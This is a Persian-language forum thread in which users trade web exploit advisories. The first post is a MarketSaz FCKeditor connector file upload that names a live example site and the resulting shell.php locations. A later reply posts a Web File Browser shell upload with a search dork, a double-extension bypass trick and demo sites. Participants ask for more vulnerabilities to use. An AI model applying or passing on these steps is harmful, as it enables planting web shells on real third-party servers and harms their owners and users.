MarketSaz remote file Upload Vulnerability

**| Red |** · 06-19-2010, 07:25 PM

البته ایشون پیداش نکرده ولی به اسم ایشون ثبت شده
هرجا هستن موفق باشن

کد:

http://inj3ct0r.com/exploits/12768

کد:

==========================================
MarketSaz remote file Upload Vulnerability
==========================================


#Exploit Title: MarketSaz remote file uploade

#Author: NetQurd (NetQurd@Live.com)

#Dork : English = Powered MarketSaz


#Software Link:  http://www.marketsaz.com

#Platform :linux/php

#Exploit : http://target.com

#http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

#Example site: http://www.langarshop.ir

#Select the "File Upload" To use = php

#http://www.langarshop.ir/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

#Sh3ll : http://www.langarshop.ir/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php

#OR

#http://www.langarshop.ir/shell.php


# Inj3ct0r.com [2010-06-18]

**h_ou20** · 02-01-2011, 06:08 PM

نقل قول:

نوشته اصلی توسط | red |

البته ایشون پیداش نکرده ولی به اسم ایشون ثبت شده
هرجا هستن موفق باشن

کد:

http://inj3ct0r.com/exploits/12768

کد:

==========================================
marketsaz remote file upload vulnerability
==========================================


#exploit title: Marketsaz remote file uploade

#author: Netqurd (netqurd@live.com)

#dork : English = powered marketsaz


#software link:  Http://www.marketsaz.com

#platform :linux/php

#exploit : Http://target.com

#http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

#example site: Http://www.langarshop.ir

#select the "file upload" to use = php

#http://www.langarshop.ir/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

#sh3ll : Http://www.langarshop.ir/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php

#or

#http://www.langarshop.ir/shell.php


# inj3ct0r.com [2010-06-18]

----------------------------------------------------------------------------------------------------------------------
این که قدیمی شده....دیگه کار نمیکنه.....اگه آسیب پذیری های دیگه رو دارین لطف کنین بزارین...

با تشکر
----------------------------------------------------------------------------------------------------------------------

**xpl_a** · 06-21-2011, 09:07 AM

نقل قول:

نوشته اصلی توسط h_ou20

----------------------------------------------------------------------------------------------------------------------
این که قدیمی شده....دیگه کار نمیکنه.....اگه آسیب پذیری های دیگه رو دارین لطف کنین بزارین...

با تشکر
----------------------------------------------------------------------------------------------------------------------

بفرما دوست عزیز این هم یک نمونه rfu دیگر که البته جدیدترین آسیب پذیری که کشف شده تو cms ایرانی باگ nuke می باشد

کد:

##################################################################
# Title : Web File Browser 0.4b14 => File[Shell]upload,Information Disclosure Vulnerability. 
#
# Author: eXeSoul
#
# Home  : 1337day.com  / www.indishell.in or www.andhrahackers.com
#
# Email : exe.soul@live.com
#
# date  : 13/5/2011
#
# d0rk:- intext:Web File Browser 0.4b14
#       
##################################################################
################################################################## 
#
#                       _ _ _ 
#                   .-"      "-.
#                  /            \
#                 |    eXeSoul   |
#                 |,  .-.  .-.  ,|
#                 | )(_o/  \o_)( |      
#                 |/     /\     \|           
#       (@_       (_     ^^     _)
#  _     ) \_______\__|IIIIII|__/_______________________________
# (_)@8@8{}<________|-\IIIIII/-|________________________________>
#        )_/         \       / 
#       (@     
#
#            +-+-+-+-+-+-+-+-+-+-+
#         --+|I|N|D|I|S|H|E|L||L|+--
#            +-+-+-+-+-+-+-+-+-+-+
#
#
################################################################## 
##################################################################
#
#    [1]
#
#    Go To Site :-
#
#   => Find its main web file Browser php file it can be anything.php
#   => you can upload file , shell anything on unpatched vrsion of Web file Browser.!
#   => upload shell via shell.php;gif or shell.php.gif like anything try temper data.!
#   => thats up to you and your skill :-P
#   => \m/
#
#   The shell ends up in the same directory.
#    
#    D3mo :-   http://pics.kick.at/autohin/index.php
#              http://hipi.comuv.com/wfb/index.php
#